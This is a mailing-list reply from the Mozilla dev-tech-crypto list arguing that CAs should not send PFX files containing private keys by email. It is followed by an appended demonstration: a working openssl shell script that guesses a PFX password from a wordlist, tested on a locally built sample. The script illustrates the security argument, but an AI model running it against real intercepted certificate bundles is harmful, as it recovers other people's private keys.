Frank Hecker:
> Eddy Nigg wrote:
>> From what I've heard about such practices, the PKX file is
>> password-protected and delivered by simple email. But obviously
>> anybody getting hold of the mail and file can easily brute-force
>> attack it with a simple script.
>>
>> I think this is the issue Nelson is addressing. Receiving a PKX file
>> from a CA web site doesn't really involve the same risk.
>
> I'm unclear on what you're saying here: Are you saying that sending a
> copy of the PKCS12 file to a user via email is less secure than having
> the user go to the web site and retrieve it himself? But if the CA tells
> the user where to download the PKCS12 file, and sends those instructions
> via email, I'm not sure what the difference would be -- someone could
> intercept the email and then download it also.
Yes, you are absolutely correct. More explicitly, I meant the difference to be a user-induced action which results in the immediate delivery of a PFX file via SSL from the CA site. PFX files which include a private key shouldn't be delivered, nor be retrievable via a URL link, by email.

-- 
Regards

Signer: Eddy Nigg, StartCom Ltd.
Jabber: [EMAIL PROTECTED]
Blog: https://blog.startcom.org

_______________________________________________
dev-tech-crypto mailing list
[email protected]
https://lists.mozilla.org/listinfo/dev-tech-crypto
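The "simple script" attack mentioned in the quoted text, as an added worked example that is not part of the thread: an offline wordlist attack against a password-protected PKCS#12 (PFX) file. It assumes only that the openssl command-line tool is installed. The key, certificate, PFX bundle and wordlist are all constructed locally by the script; a CA-issued bundle intercepted from email would be attacked in exactly the same way, with nothing but local CPU time limiting the number of guesses.

```shell
#!/bin/sh
# Added demonstration, not code from the thread: offline guessing of a
# PKCS#12 (PFX) password with the openssl CLI. Every guess is a local
# MAC/decryption check, so no server ever sees or throttles the attempts.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Build a throwaway key + self-signed cert and bundle them into a PFX
# protected by the password given as $1 (constructed sample data).
make_sample_pfx() {
  openssl req -x509 -newkey rsa:2048 -nodes -subj "/CN=sample" -days 1 \
      -keyout "$WORK/key.pem" -out "$WORK/cert.pem" >/dev/null 2>&1
  openssl pkcs12 -export -inkey "$WORK/key.pem" -in "$WORK/cert.pem" \
      -out "$WORK/user.pfx" -passout "pass:$1"
}

# Try every line of the wordlist as the PFX password. `openssl pkcs12 -noout`
# verifies the bundle's MAC and decrypts the key, so it succeeds only with
# the right password. Prints the first hit and returns 0, else returns 1.
crack_pfx() {
  pfx=$1
  wordlist=$2
  while IFS= read -r candidate; do
    if openssl pkcs12 -in "$pfx" -noout -passin "pass:$candidate" >/dev/null 2>&1; then
      printf '%s\n' "$candidate"
      return 0
    fi
  done < "$wordlist"
  return 1
}

# Stand-alone demo: a weak password falls to a constructed ten-word list.
make_sample_pfx "letmein"
printf '%s\n' password 123456 qwerty "" welcome admin letmein secret changeme test \
    > "$WORK/words.txt"
if hit=$(crack_pfx "$WORK/user.pfx" "$WORK/words.txt"); then
  echo "PFX password recovered: '$hit' (private key now readable by the attacker)"
else
  echo "password not in wordlist"
fi
```

The default key-derivation iteration count in a PFX slows each guess by a few milliseconds, which is no obstacle to an attacker holding the file. That is the point of the reply above: the password travelling in or alongside the same email as the file adds nothing, so a bundle containing the private key should only be handed over in an authenticated, user-initiated download over SSL, never as an attachment or a mailed link.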

